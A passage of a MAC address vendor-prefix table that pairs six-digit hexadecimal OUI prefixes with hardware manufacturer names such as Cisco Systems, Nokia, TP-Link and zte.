technology +A8F038 Shen Zhen SHI JIN HUA TAI Electronics +74E277 Vizmonet Pte +10A659 Mobile Create +58856E QSC AG +FCAFAC Socionext +F8C397 Nzxt +C4366C LG Innotek +60D9A0 Lenovo Mobile Communication Technology +5C3B35 Gehirn +5CF7C3 Syntech (hk) Technology Limited +3CC2E1 Xinhua Control Engineering +7C534A Metamako +9C3066 RWE Effizienz GmbH +FCA22A PT. Callysta Multi Engineering +247656 Shanghai Net Miles Fiber Optics Technology +A0ADA1 JMR Electronics +601970 Huizhou Qiaoxing Electronics Technology +887033 Hangzhou Silan Microelectronic +8C7967 zte +78F944 Private +CCA4AF Shenzhen Sowell Technology +84F129 Metrascale +2028BC Visionscape +B8F080 SPS +7858F3 Vachen +FCDC4A G-Wearables +F42C56 Senor Tech +50502A Egardia +48EE0C D-Link International +48C093 Xirrus +3C1A0F ClearSky Data +ACB57D Liteon Technology +DCE1AD Shenzhen Wintop Photoelectric Technology +900CB4 Alinket Electronic Technology +883B8B Cheering Connection +94D417 GPI Korea +D855A3 zte +70DA9C Tecsen +6CF5E8 Mooredoll +70FF5C Cheerzing Communication(Xiamen)Technology +08115E Bitel +44CE7D SFR +0881BC HongKong Ipro Technology, Limited +4C16F1 zte +800902 Keysight Technologies +6872DC Cetory.tv Company Limited +D8B6B7 Comtrend +0499E6 Shenzhen Yoostar Technology +94BF95 Shenzhen Coship Electronics +FC9FE1 Conwin.tech. +90203A BYD Precision Manufacture +A81B5D Foxtel Management +B8BD79 TrendPoint Systems +2C010B Nascent Technology, - Remkon +D4EC86 LinkedHope Intelligent Technologies +20A99B Microsoft +A0A3E2 Actiontec Electronics +54098D deister electronic GmbH +F0FE6B Shanghai High-Flying Electronics Technology +3CAE69 ESA Elektroschaltanlagen Grimma GmbH +00F3DB WOO Sports +08A5C8 Sunnovo International Limited +848EDF Sony Mobile Communications AB +CCBDD3 Ultimaker +50294D Nanjing IOT Sensor Technology +0CCFD1 Springwave +58108C Intelbras +187117 eta plus electronic gmbh +7CB177 Satelco AG +8C5D60 UCI +4C0BBE Microsoft +08EB29 Jiangsu Huitong Group +E48C0F Discovery Insure +587FB7 Sonar Industrial +E42354 Shenzhen Fuzhi Software Technology +207693 Lenovo (Beijing) Limited. +C4BD6A SKF GmbH +14488B Shenzhen Doov Technology +603696 The Sapling Company +54FFCF Mopria Alliance +BCBC46 SKS Welding Systems GmbH +A8D88A Wyconn +00E6E8 Netzin Technology +64B21D Chengdu Phycom Tech +88708C Lenovo Mobile Communication Technology +F03D29 Actility +909F33 EFM Networks +849681 Cathay Communication +A056B2 Harman/Becker Automotive Systems GmbH +40C62A Shanghai Jing Ren Electronic Technology +E8150E Nokia +F4D032 Yunnan Ideal Information&Technology. +44A6E5 Thinking Technology +A8329A Digicom Futuristic Technologies +B40AC6 Dexon Systems +5CB8CB Allis Communications +E85D6B Luminate Wireless +8C3357 HiteVision Digital Media Technology +F4D261 Semocon +D05AF1 Shenzhen Pulier Tech +481A84 Pointer Telocation +DC663A Apacer Technology +B009D3 Avizia +3CAA3F iKey +0C383E Fanvil Technology +60CDA9 Abloomy +B40B44 Smartisan Technology +A0FC6E Telegrafia a.s. +44D4E0 Sony Mobile Communications AB +D0FA1D Qihoo 360 Technology +046785 scemtec Hard- und Software fuer Mess- und Steuerungstechnik GmbH +FC6DC0 BME +784561 CyberTAN Technology +D896E0 Alibaba Cloud Computing +300D2A Zhejiang Wellcom Technology +64EAC5 SiboTech Automation +F4F26D TP-Link Technologies +5C1515 Advan +D0A0D6 Chengdu TD Tech +8CBF9D Shanghai Xinyou Information Technology +D49398 Nokia +78D66F Aristocrat Technologies Australia +50C7BF TP-Link Technologies +C06118 TP-Link Technologies +D0C7C0 TP-Link Technologies +209AE9 Volacomm +345D10 Wytek +58E326 Compass Technologies +848DC7 Cisco Spvtg +A8BD3A Unionman Technology +C44E1F BlueN +CCA614 Aifa Technology +B0869E Chloride S.r.L +344F5C R&M AG +A46CC1 LTi REEnergy GmbH +90DB46 E-lead Electronic +D42F23 Akenori PTE +286336 Siemens AG - Industrial Automation - EWA +38F098 Vapor Stone Rail Systems +400107 Arista +4C8B30 Actiontec Electronics +0805CD DongGuang EnMai Electronic ProductLtd. +0092FA Shenzhen Wisky Technology +4CF45B Blue Clover Devices +B06971 DEI Sales +580528 Labris Networks +28656B Keystone Microtech +EC2E4E Hitachi-lg Data Storage +505800 WyTec International +78923E Nokia +D4CFF9 Shenzhen Sen5 Technology +D8492F Canon +D46761 Sahab Technology +145645 Savitech +D4E08E ValueHD +70305D Ubiquoss +5850AB TLS +90DFB7 s.m.s smart microwave sensors GmbH +B843E4 Vlatacom +E07F53 Techboard SRL +4C0DEE Jabil Circuit (shanghai) +A07771 Vialis BV +D0BD01 DS International +C0C569 Shanghai Lynuc CNC Technology +200E95 IEC TC9 Wg43 +E0DB88 Open Standard Digital-if Interface for Satcom Systems +D86194 Objetivos y Sevicios de Valor Anadido +589CFC FreeBSD Foundation +98349D Krauss Maffei Technologies GmbH +18CC23 Philio Technology +648D9E IVT Electronic +CC95D7 Vizio +749C52 Huizhou Desay SV Automotive +C0F79D Powercode +3C0C48 Servergy +68D247 Portalis LC +FC27A2 Trans Electric +14C089 Dune HD +F08A28 Jiangsu Hengsion Electronic S and T +A8574E TP-Link Technologies +DC3EF8 Nokia +706173 Calantec GmbH +50C271 Securetech +7C49B9 Plexus Manufacturing Sdn Bhd +184462 Riava Networks +9C443D Chengdu Xuguang Technology +74A4B5 Powerleader Science and Technology +BC4100 Codaco Electronic S.r.o. +7CCD3C Guangzhou Juzing Technology +10B26B base +DCCEBC Shenzhen JSR Technology +9486D4 Surveillance Pro +F89550 Proton Products Chengdu +447BC4 DualShine Technology(SZ)Co. +542F89 Euclid Laboratories +48B977 PulseOn Oy +AC2DA3 Txtr Gmbh +C8F68D S.e.technologies Limited +BC14EF Iton Technology Limited +14F28E ShenYang ZhongKe-Allwin TechnologyLTD +C064C6 Nokia +9C44A6 SwiftTest +44C4A9 Opticom Communication +6C3C53 SoundHawk +64BABD SDJ Technologies +889166 Viewcooper +103378 Flectron +DC0575 Siemens Energy Automation +5C1193 Seal One AG +B4527E Sony Mobile Communications AB +50E14A Private +68FCB3 Next Level Security Systems +70305E Nanjing Zhongke Menglian Information Technology +9C8888 Simac Techniek NV +180C14 iSonea Limited +8CAE89 Y-cam Solutions +58B961 Solem Electronique +F46ABC Adonit +20180E Shenzhen Sunchip Technology +80B219 Elektron Technology UK Limited +D08A55 Skullcandy +C4D655 Tercel technology +9CA10A Scle SFE +78D99F NuCom HK +44C56F NGN Easy Satfinder (Tianjin) Electronic +2C5A05 Nokia +848336 Newrun +EC71DB Shenzhen Baichuan Digital Technology +B8266C Anov France +284D92 Luminator +1C4BB9 SMG Enterprise +0C5CD8 Doli Elektronik Gmbh +2C5FF3 Pertronic Industries +E0AF4B Pluribus Networks +C85663 Sunflex Europe GmbH +88FED6 ShangHai WangYong Software +600347 Billion Electric +084027 Gridstore +7C2048 KoamTac +705986 OOO TTV +20DF3F Nanjing SAC Power Grid Automation +30786B Tianjin Golden Pentagon Electronics +4CD637 Qsono Electronics +8CF945 Power Automation pte +2C922C Kishu Giken Kogyou Company +509871 Inventum Technologies Private Limited +384233 Wildeboer Bauteile GmbH +9440A2 Anywave Communication Technologies +7CB77B Paradigm Electronics +28A241 exlar +9876B6 Adafruit +AC220B Asustek Computer +88354C Transics +709BFC Bryton +D82D9B Shenzhen G.Credit Communication Technology +94BF1E eflow / Smart Device Planning and Development Division +C0A39E EarthCam +088E4F SF Software Solutions +DCAE04 Celoxica +5422F8 zte +486E73 Pica8 +A0CEC8 CE Link Limited +907A28 Beijing Morncloud Information And Technology +CCD29B Shenzhen Bopengfa Elec&Technology +9C4EBF BoxCast +34A68C Shine Profit Development Limited +78DAB3 GBO Technology +80BBEB Satmap Systems +949FB4 ChengDu JiaFaAnTai Technology +406826 Thales UK Limited +5C15E1 Aidc Technology (S) PTE +048D38 Netcore Technology +1C4AF7 Amon +985D46 PeopleNet Communication +446755 Orbit Irrigation +789F4C Hoerbiger Elektronik Gmbh +98F8C1 IDT Technology Limited +F47A4E Woojeon&Handan +44700B Iffu +8C2F39 IBA Dosimetry GmbH +B8F828 Changshu Gaoshida Optoelectronic Technology +58468F Koncar Electronics and Informatics +746630 T:mi Ytti +B0FEBD Private +940BD5 Himax Technologies +30055C Brother industries +0C8268 TP-Link Technologies +B01743 Edison Global Circuits +90DA4E Avanu +7038B4 Low Tech Solutions +4C804F Armstrong Monitoring +901D27 zte +7CD762 Freestyle Technology +D073D5 Lifi Labs Management +B8C46F Primmcon Industries +505AC6 Guangdong Super Telecom +38A86B Orga BV +141330 Anakreon UK LLP +0CF405 Beijing Signalway Technologies +1C76CA Terasic Technologies +0C1105 Ringslink (Xiamen) Network Communication Technologies +945047 Rechnerbetriebsgruppe +D8DCE9 Kunshan Erlab ductless filtration system +54112F Sulzer Pump Solutions Finland Oy +4C55B8 Turkcell Teknoloji +088039 Cisco Spvtg +2C72C3 Soundmatters +84E4D9 Shenzhen Need Technology +C44838 Satcom Direct +545414 Digital RF Corea +24EB65 Saet I.S. S.r.l. +D0F27F SteadyServ Technoligies +DC647C C.R.S. iiMotion GmbH +188410 CoreTrust +A08A87 HuiZhou KaiYue Electronic +04BFA8 ISB +5C8486 Brightsource Industries Israel +28CD9C Shenzhen Dynamax Software Development +E0EDC7 Shenzhen Friendcom Technology Development +2CF203 Emko Elektronik SAN VE TIC AS +246278 sysmocom - systems for mobile communications GmbH +F45842 Boxx TV +A861AA Cloudview Limited +C89346 Mxchip Company Limited +F0F260 Mobitec AB +1423D7 Eutronix +3CFB96 Emcraft Systems +081F3F WondaLink +DC6F08 Bay Storage Technology +E492E7 Gridlink Tech. +60BB0C Beijing HuaqinWorld Technology +70E027 Hongyu Communication Technology Limited +E880D8 Gntek Electronics +188857 Beijing Jinhong Xi-Dian Information Technology +287994 Realplay Digital Technology(Shenzhen) +105C3B Perma-Pipe +40C4D6 ChongQing Camyu Technology Development +A0EB76 AirCUVE +6C6126 Rinicom Holdings +C04DF7 Serelec +ECD040 GEA Farm Technologies GmbH +005907 LenovoEMC Products USA +78B3CE Elo touch solutions +A8FB70 WiseSec L.t.d +30F31D zte +E4776B Aartesys AG +5C335C Swissphone Telecom AG +A4FCCE Security Expert +E0CEC3 Askey Computer +5C43D2 Hazemeyer +D819CE Telesquare +D809C3 Cercacor Labs +84ED33 Bbmc +681E8B InfoSight +C044E3 Shenzhen Sinkna Electronics +08F1B7 Towerstream Corpration +20858C Assa +187A93 Amiccom Electronics +94C962 Teseq AG +384369 Patrol Products Consortium +D08B7E Passif Semiconductor +6886E7 Orbotix +2CE871 Alert Metalguard ApS +58D071 BW Broadcast +C0A0C7 Fairfield Industries +98208E Definium Technologies +704AE4 Rinstrum +68B8D9 Act KDE +F84897 Hitachi +74E424 Apiste +58D6D3 Dairy Cheq +68FB95 Generalplus Technology +E4C146 Objetivos y Servicios de Valor A +D4BF2D SE Controls Asia Pacific +C45DD8 Hdmi Forum +C44EAC Shenzhen Shiningworth Technology +C458C2 Shenzhen Tatfook Technology +44184F Fitview +8C76C1 Goden Tech Limited +DC2A14 Shanghai Longjing Technology +0C191F Inform Electronik +080FFA KSP +ECFC55 A. Eberle GmbH & KG +0C8CDC Suunto Oy +20B5C6 Mimosa Networks +AC3CB4 Nilan A/S +8007A2 Esson Technology +2C3557 Elliy Powerltd +6C5A34 Shenzhen Haitianxiong Electronic +485A3F Wisol +70F1E5 Xetawave +C0AA68 Osasi Technos +B829F7 Blaster Tech +00C14F DDL +5CE0CA FeiTian United (Beijing) System Technology +9C9811 Guangzhou Sunrise Electronics Development +A0FE91 Avat Automation Gmbh +5809E5 Kivic +74ECF1 Acumen +6815D3 Zaklady Elektroniki i Mechaniki Precyzyjnej R&G +601929 Voltronic Power Technology(shenzhen) +C0BD42 ZPA Smart Energy a.s. +48B253 Marketaxess +60D2B9 Realand BIO +2067B1 Pluto +087D21 Altasec technology +30FD11 Macrotech (usa) +F8051C DRS Imaging and Targeting Solutions +6032F0 Mplus technology +749975 IBM +0CDCCC Inala Technologies +F0ACA4 HBC-radiomatic +14DB85 S NET Media +D493A0 Fidelix Oy +AC7236 Lexking Technology +CCB3F8 Fujitsu Isotec Limited +3CD7DA SK Mtek microelectronics(shenzhen)limited +E86D54 Digit Mobile +9857D3 HON Hai-ccpbg Precision Ind.co. +9C8D1A Integ Process Group +742D0A Norfolk Elektronik AG +480362 Desay Electronics(huizhou)co. +B0358D Nokia +0CF361 Java Information +34BDFA Cisco Spvtg +8CEEC6 Precepscion +ECD950 IRT SA +74273C ChangYang Technology (Nanjing) +087CBE Quintic +C4AD21 Mediaedge +DCBF90 Huizhou Qiaoxing Telecommunication Industry +E0F5CA Cheng UEI Precision Industry +1C5C60 Shenzhen Belzon Technology +2CEDEB Alpheus Digital Company Limited +381C4A Simcom Wireless Solutions +901EDD Great Computer +2C6289 Regenersis (Glenrothes) +F093C5 Garland Technology +4C09B4 zte +B8B94E Shenzhen iBaby Labs +00F403 Orbis Systems Oy +ACC698 Kohzu Precision +907025 Garea Microsys +502ECE Asahi Electronics +440CFD NetMan +7CEBEA Asct +085B0E Fortinet +4C0FC7 Earda Electronics +64C944 Lark Technologies +6869F2 ComAp s.r.o. +B889CA Iljin Electric +B85AFE Handaer Communication Technology (Beijing) +604616 Xiamen Vann Intelligent +ECD925 Rami +049F06 Smobile +D806D1 Honeywell Fire System (Shanghai) +8C6AE4 Viogem Limited +20C1AF i Wit Digital, Limited +D88A3B Unit-em +BCD940 ASR +EC4993 Qihan Technology +B0ACFA Fujitsu Limited +1C959F Veethree Electronics And Marine +18D949 Qvis Labs +646223 Cellient +ACF0B2 Becker Electronics Taiwan +10A932 Beijing Cyber Cloud Technology +C47BA3 Navis +A81758 Elektronik System i Ume AB +44348F MXT Industrial Ltda +9C0111 Shenzhen Newabel Electronic +0CA138 Blinq Wireless +348137 Unicard SA +64F242 Gerdes Aktiengesellschaft +60F281 Tranwo Technology +642400 Xorcom +4CAA16 AzureWave Technologies (Shanghai) +1C6BCA Mitsunami +08379C Topaz +E83EFB Geodesic +4016FA EKM Metering +3C363D Nokia +BC0200 Stewart Audio +1C973D Pricom Design +F00786 Shandong Bittel Electronics +885C47 Alcatel Lucent +E0F9BE Cloudena +3CC1F6 Melange Systems Pvt. +54E63F ShenZhen LingKeWeiEr Technology +F88C1C Kaishun Electronic Technology, Beijing +940149 AutoHotBox +C035BD Velocytech Aps +F897CF Daeshin-information Technology +383F10 DBL Technology +8C6878 Nortek-AS +8016B7 Brunel University +9C611D Omni-ID USA +78BEBD Stulz Gmbh +3C9174 Along Communication Technology +E8D0FA MKS Instruments Deutschland GmbH +98262A Applied Research Associates +B0D2F5 Vello Systems +C89F42 Vdii Innovation AB +A41875 Cisco Systems +640E94 Pluribus Networks +6CE983 Gastron +0CB4EF Digience +D0DB32 Nokia +609084 Dssd +A4E731 Nokia +0808EA Amsc +C05E79 Shenzhen Huaxun ARK Technologies +A4934C Cisco Systems +E85484 NEO Information Systems +74AE76 iNovo Broadband +60B933 Deutron Electronics +38EE9D Anedo +80CEB1 Theissen Training Systems GmbH +3C3888 ConnectQuest +08BE09 Astrol Electronic AG +D8B8F6 Nantworks +6044F5 Easy Digital +AC51EE Cambridge Communication Systems +10E4AF APR +B0BD6D Echostreams Innovative Solutions +F0D14F Linear +AC3D75 Hangzhou Zhiway Technologies +141A51 Treetech Sistemas Digitais +845787 DVR C&C +F436E1 Abilis Systems Sarl +587FC8 S2M +C49805 Minieum Networks +90F4C1 Rand McNally +18193F Tamtron Oy +F8F7FF Syn-tech Systems +F473CA Conversion Sound +00E8AB Meggitt Training Systems +18421D Private +C401B1 SeekTech +1C5FFF Beijing Ereneben Information Technology,Ltd Shenzhen Branch +C0C946 Mitsuya Laboratories +ACC2EC CLT Int'l IND. +702F4B PolyVision +741489 SRT Wireless +94CA0F Honeywell Analytics +848D84 Rajant +D8337F Office FA.com +7CEF8A Inhon International +84AF1F Beat System Service +100D2F Online Security +408B07 Actiontec Electronics +980284 Theobroma Systems GmbH +E03C5B Shenzhen Jiaxinjie Electron +645563 Intelight +C467B5 Libratone A/S +A4EF52 Telewave +F4044C ValenceTech Limited +1CBBA8 Ojsc Ufimskiy Zavod Promsvyaz +506028 Xirrus +24B657 Cisco Systems +940B2D NetView Technologies(Shenzhen) +306E5C Validus Technologies +E843B6 Qnap Systems +5CC9D3 Palladium Energy Eletronica DA Amazonia Ltda +407B1B Mettle Networks +64E161 DEP +C8A620 Nebula +989080 Linkpower Network System +0064A6 Maquet CardioVascular +3C4E47 Etronic A/S +C8F9F9 Cisco Systems +F0F755 Cisco Systems +B01C91 Elim +0CA2F4 Chameleon Technology (UK) Limited +846AED Wireless Tsukamoto. +D8E952 Keopsys +3CB9A6 Belden Deutschland GmbH +3440B5 IBM +90D74F Bookeen +905682 Lenbrook Industries Limited +CC6DEF TJK Tietolaite Oy +3CE624 LG Display +D8F0F2 Zeebo +B0CF4D MI-Zone Technology Ireland +143605 Nokia +B87424 Viessmann Elektronik GmbH +C81AFE Dlogic Gmbh +9C53CD Engicam S.r.l. +DCC101 SOLiD Technologies +AC6FBB Tatung Technology +1803FA IBT Interfaces +608645 Avery Weigh-Tronix +541DFB Freestyle Energy +9CF67D Ricardo Prague, s.r.o. +A0E201 AVTrace(China) +04EE91 x-fabric GmbH +183825 Wuhan Lingjiu High-tech +5404A6 Asustek Computer +F83376 Good Mind Innovation +C46044 Everex Electronics Limited +645422 Equinox Payments +D412BB Quadrant Components +40E793 Shenzhen Siviton Technology +2C67FB ShenZhen Zhengjili Electronics +D89760 C2 Development +1CB17F NEC Platforms +942E17 Schneider Electric Canada +B89674 AllDSP GmbH & KG +6CA682 Edam Information & Communications +48A22D Shenzhen Huaxuchang Telecom Technology +50ED94 Egatel SL +B87447 Convergence Technologies +70A66A Prox Dynamics AS +DC175A Hitachi High-Technologies +5C076F Thought Creator +3C0FC1 KBC Networks +58E636 EVRsafe Technologies +90D11B Palomar Medical Technologies +CC60BB Empower RF Systems +24497B Innovative Converged Devices +ECBD09 Fusion Electronics +54847B Digital Devices GmbH +705CAD Konami Gaming +788973 CMC +DCCE41 FE Global Hong Kong Limited +4C774F Embedded Wireless Labs +203706 Cisco Systems +7C4C58 Scale Computing +FCC23D Atmel +7C1E52 Microsoft +DCB4C4 Microsoft XCG +74FDA0 Compupal (Group) +C029F3 XySystem +48F317 Private +B07D62 Dipl.-Ing. H. Horstmann GmbH +68974B Shenzhen Costar Electronics +B8BB6D Eneres +645DD7 Shenzhen Lifesense Medical Electronics +D45AB2 Galleon Systems +C40142 MaxMedia Technology Limited +A06E50 Nanotek Elektronik Sistemler Sti. +182C91 Concept Development +EC4670 Meinberg Funkuhren GmbH & KG +B40B7A Brusa Elektronik AG +BC764E Rackspace US +C4EEAE VSS Monitoring +2437EF EMC Electronic Media Communication SA +D4F63F IEA S.r.l. +4C0289 LEX Computech +E435FB Sabre Technology (Hull) +00CD90 MAS Elektronik AG +A8BD1A Honey Bee (Hong Kong) Limited +ACCC8E Axis Communications AB +187C81 Valeo Vision Systems +DC1EA3 Accensus +A40130 ABIsystems +68F125 Data Controls +706F81 Private +30E4DB Cisco Systems +742B0F Infinidat +280CB8 Mikrosay Yazilim ve Elektronik A.S. +A06CEC RIM +443EB2 Deotron +8CB82C IPitomy Communications +807DE3 Chongqing Sichuan Instrument MicrocircuitLTD. +1C8E8E DB Communication & Systems +F0022B Chrontel +007F28 Actiontec Electronics +0C924E Rice Lake Weighing Systems +40040C A&T +A0165C Triteka +90B97D Johnson Outdoors Marine Electronics d/b/a Minnkota +8821E3 Nebusens +B0F1BC Dhemax Ingenieros Ltda +3C096D Powerhouse Dynamics +CC501C KVH Industries +AC6FD9 Valueplus +A4E391 Deny Fontaine +04A82A Nokia +48D8FE ClarIDy Solutions +70B265 Hiltron s.r.l. +84D9C8 Unipattern +1C955D I-lax Electronics +94AAB8 Joview(Beijing) Technology +18B3BA Netlogic AB +F43E9D Benu Networks +6469BC Hytera Communications +64094C Beijing Superbee Wireless Technology +F0AE51 Xi3 +782EEF Nokia +78510C LiveU +306118 Paradom +C84529 IMK Networks +A88CEE MicroMade Galka i Drozdz sp.j. +204005 feno GmbH +6C81FE Mitsuba +E8F928 Rftech SRL +703AD8 Shenzhen Afoundry Electronic +4C98EF Zeo +DCA6BD Beijing Lanbo Technology +58E808 Autonics +8058C5 NovaTec Kommunikationstechnik GmbH +C0EAE4 Sonicwall +F8A9DE Puissance Plus +D4F027 Navetas Energy Management +5C0CBB Celizion +B8871E Good Mind Industries +F8EA0A Dipl.-Math. Michael Rauch +BC5FF4 ASRock Incorporation +A4B36A JSC SDO Chromatec +905F8D modas GmbH +E0C922 Jireh Energy Tech. +28401A C8 MediSensors +DC3C84 Ticom Geomatics +E8CC32 Micronet +9C6ABE Qees ApS. +3429EA MCD Electronics SP. Z O.O. +D43AE9 Dongguan ipt Industrial +ACC935 Ness +7C4A82 Portsmith +2C0033 EControls +E0F211 Digitalwatt +0432F4 Partron +AC199F Sungrow Power Supply +1CAA07 Cisco Systems +308CFB Dropcam +CCF841 Lumewave +701404 Limited Liability Company +1C35F1 NEW Lift Neue Elektronische Wege Steuerungsbau GmbH +CCD9E9 SCR Engineers +F0DB30 Yottabyte +9C31B6 Kulite Semiconductor Products +5C6A7D Kentkart EGE Elektronik SAN. VE TIC. STI. +04FF51 Novamedia Innovision SP. Z O.O. +FCD4F2 The Coca Cola Company +C471FE Cisco Systems +340804 D-Link +B44CC2 NR Electric +084EBF Broad Net Mux +48CB6E Cello Electronics (UK) +EC3BF0 NovelSat +A86A6F RIM +4022ED Digital Projection +0817F4 IBM +C4D489 JiangSu Joyque Information Industry +1C7C11 EID +B0B32B Slican Sp. z o.o. +5842E4 Baxter International +8CA048 Beijing NeTopChip Technology +804F58 ThinkEco +B06563 Shanghai Railway Communication Factory +349A0D ZBD Displays +A0B5DA Hongkong Thtf +CCCD64 SM-Electronic GmbH +E82877 TMY +AC8112 Gemtek Technology +6CA906 Telefield +3C02B1 Creation Technologies LP +E46C21 messMa GmbH +0470BC Globalstar +E05FB9 Cisco Systems +081735 Cisco Systems +20FECD System In Frontier +94D019 Cydle +2CA157 acromate +70DDA1 Tellabs +30EB25 Intek Digital +BC3E13 Accordance Systems +0455CA BriView (Xiamen) +D45D42 Nokia +BC2846 NextBIT Computing Pvt. +4425BB Bamboo Entertainment +B8A8AF Logic +648125 Alphatron Marine BV +042605 GFR Gesellschaft fr Regelungstechnik und Energieeinsparung mbH +9C645E Harman Consumer Group +78CD8E SMC Networks +5C9AD8 Fujitsu Limited +144C1A Max Communication GmbH +BC6E76 Green Energy Options +108CCF Cisco Systems +74E06E Ergophone GmbH +18AF9F Digitronic Automationsanlagen Gmbh +EC4644 TTK SAS +DCD87F Shenzhen JoinCyber Telecom Equipment +B08991 LGE +44DCCB Semindia Systems PVT +90D92C Hug-witschi AG +B428F1 E-Prime +B4749F Askey Computer +AC2FA8 Humannix +7C4AA8 MindTree Wireless PVT +C8A70A Verizon Business +304EC3 Tianjin Techua Technology +BC4377 Hang Zhou Huite Technology +A81B18 XTS +04E2F8 AEP Ticketing solutions srl +8C5105 Shenzhen ireadygo Information Technology +28E297 Shanghai InfoTM Microelectronics +D093F8 Stonestreet One +1C334D ITS Telecom +609E64 Vivonic GmbH +D44F80 Kemper Digital GmbH +34684A Teraworks +0CC6AC Dags +D82A7E Nokia +5CBD9E Hongkong Miracle Eagle Technology(group) Limited +743889 Annax Anzeigesysteme Gmbh +647FDA Tektelic Communications +90610C Fida International (S) Pte +3C5F01 Synerchip +708B78 citygrow technology +74CD0C Smith Myers Communications +B8EE79 YWire Technologies +40C245 Shenzhen Hexicom Technology +7076F0 LevelOne Communications (India) Private Limited +48C8B6 SysTec GmbH +9C4563 Dimep Sistemas +E42771 Smartlabs +0876FF Thomson Telecom Belgium +401D59 Biometric Associates +4C2C80 Beijing Skyway Technologies +08D29A Proformatique +90D852 Comtec +28061E Ningbo Global Useful Electric +4037AD Macro Image Technology +64E8E6 global moisture management system +34A183 AWare +588D09 Cisco Systems +342109 Jensen Scandinavia AS +08FAE0 Fohhn Audio AG +506F9A Wi-Fi Alliance +7CF098 Bee Beans Technologies +9C7514 Wildix srl +BC7DD1 Radio Data Comms +28068D ITL +F0D767 Axema Passagekontroll AB +A4AE9A Maestro Wireless Solutions +5CD135 Xtreme Power Systems +9C28BF Continental Automotive Czech Republic s.r.o. +206FEC Braemac CA +64A232 OOO Samlight +A082C7 P.T.I +F41F0B Yamabishi +447C7F Innolight Technology +FC75E6 Handreamnet +20B0F7 Enclustra GmbH +4013D9 Global ES +F4DC4D Beijing CCD Digital Technology +F8B599 Guangzhou Chnavs Digital Technology +7C3920 Ssoma Security +9C77AA Nadasnv +D8B6C1 NetworkAccountant +58D08F Ieee 1904.1 Working Group +3C99F7 Lansentechnology AB +94E711 Xirka Dama Persada PT +507D02 Biodit +F44227 S & S Research +D4CBAF Nokia +CC09C8 Imaqliq +C4B512 General Electric Digital Energy +E02538 Titan Pet Products +CC7A30 Cmax Wireless +D8760A Escort +6063FD Transcend Communication Beijing +E08A7E Exponent +80C6CA Endian s.r.l. +F8DAE2 Beta LaserMike +E80462 Cisco Systems +70B08C Shenou Communication Equipment +F0E5C3 Drgerwerk AG & KG aA +446132 ecobee +A4B2A7 Adaxys Solutions AG +F455E0 Niceway CNC Technology,Ltd.Hunan Province +AC4FFC Svs-vistek Gmbh +FC7CE7 FCI USA +145412 Entis +807D1B Neosystem +14FEAF Sagittar Limited +7CB542 Aces Technology +40CD3A Z3 Technology +045D56 camtron industrial +AC83F0 ImmediaTV +6CE0B0 Sound4 +00336C SynapSense +E446BD C&C Technic Taiwan +7415E2 Tri-Sen Systems +F0BDF1 Sipod +288915 CashGuard Sverige AB +40618E Stella-Green +9C4E20 Cisco Systems +408493 Clavister AB +1C3A4F AccuSpec Electronics +58E747 Deltanet AG +D87533 Nokia +ECFE7E BlueRadios +7C6F06 Caterpillar Trimble Control Technologies +7C7673 Enmas Gmbh +6C6F18 Stereotaxis +003532 Electro-Metrics +44376F Young Electric Sign +8C640B Beyond Devices d.o.o. +F04335 DVN(Shanghai)Ltd. +A479E4 Klinfo +003CC5 Wonwoo Engineering +E85E53 Infratec Datentechnik GmbH +C848F5 Medison Xray +1C17D3 Cisco Systems +ACBE75 Ufine Technologies +D87157 Lenovo Mobile Communication Technology +806629 Prescope Technologies +90F278 Radius Gateway +68CA00 Octopus Systems Limited +4C3089 Thales Transportation Systems GmbH +0C7D7C Kexiang Information Technology +70D880 Upos System sp. z o.o. +0CC9C6 Samwin Hong Kong Limited +B45861 CRemote +B8653B Bolymin +B0973A E-Fuel +A05DC1 Tmct +E0CA4D Shenzhen Unistar Communication +E497F0 Shanghai VLC Technologies +204E6B Axxana(israel) +50F003 Open Stack +0C17F1 Telecsys +98BC99 Edeltech +E8E1E2 Energotest +FC683E Directed Perception +6C1811 Decatur Electronics +94592D EKE Building Technology Systems +9CC077 PrintCounts +A85BB0 Shenzhen Dehoo Technology +089F97 Leroy Automation +4C5DCD Oy Finnish Electric Vehicle Technologies +10090C Janome Sewing Machine +ECB106 Acuro Networks +7C2E0D Blackmagic Design +08F6F8 GET Engineering +6CDC6A Promethean Limited +9055AE Ericsson, EAB/RWI/K +2C3A28 Fagor Electrnica +90A7C1 Pakedge Device and Software +80F593 Irco Sistemas de Telecomunicacin +6CFDB9 Proware Technologies +6CFFBE MPB Communications +583CC6 Omneality +0097FF Heimann Sensor GmbH +34BA51 Se-Kure Controls +44A8C2 Sewoo Tech +8CD628 Ikor Metering +481BD2 Intron Scientific +009363 Uni-Link Technology +64DB18 OpenPattern +580556 Elettronica GF S.r.L. +88B627 Gembird Europe BV +D41F0C JAI Oy +3C4C69 Infinity System S.L. +44E49A Omnitronics +74F07D BnCOM +1065A3 Core Brands +20415A Smarteh d.o.o. +703C39 Seawing Kft +14A86B ShenZhen Telacom Science&Technology +0CC3A7 Meritec +4C322D Teledata Networks +B8B1C7 Bt&com +A0BFA5 Coresys +D411D6 ShotSpotter +7CCB0D Antaira Technologies +ECE9F8 Guang Zhou TRI-SUN Electronics Technology +9CAFCA Cisco Systems +34CE94 Parsec (Pty) +ACE9AA Hay Systems +082AD0 SRD Innovations +24828A Prowave Technologies +6C0F6A JDC Tech +6CF049 Giga-byte Technology +D4C766 Acentic GmbH +48EB30 Eterna Technology +207C8F Quanta Microsystems +F8472D X2gen Digital +8C598B C Technologies AB +64F970 Kenade Electronics Technology +A04025 Actioncable +78998F Mediline Italia SRL +40ECF8 Siemens AG +F04BF2 Jtech Communications +A8CB95 East Best +C8D1D1 AGAiT Technology +3CF52C Dspecialists Gmbh +040EC2 ViewSonic Mobile China Limited +5403F5 EBN Technology +7C2F80 Gigaset Communications GmbH +446C24 Reallin Electronic +A0593A V.D.S. Video Display Systems srl +A8F94B Eltex Enterprise +906DC8 DLG Automao Industrial Ltda +48343D IEP GmbH +C8C13C RuggedTek Hangzhou +609F9D CloudSwitch +0CE936 Elimos srl +A4DE50 Total Walther GmbH +E8A4C1 Deep Sea Electronics PLC +701AED Advas +64C6AF Axerra Networks +D8D67E GSK CNC Equipment +A4E7E4 Connex GmbH +AC583B Human Assembler +A05DE7 Directv +10CA81 Precia +003A98 Cisco Systems +705AB6 Compal Information (kunshan) +003A9A Cisco Systems +ACBEB6 Visualedge Technology +40A6A4 PassivSystems +903D6B Zicon Technology +7C3BD5 Imago Group +B894D2 Retail Innovation HTT AB +DCE71C AUG Elektronik GmbH +88A5BD Qpcom +DC3350 TechSAT GmbH +00271E Xagyl 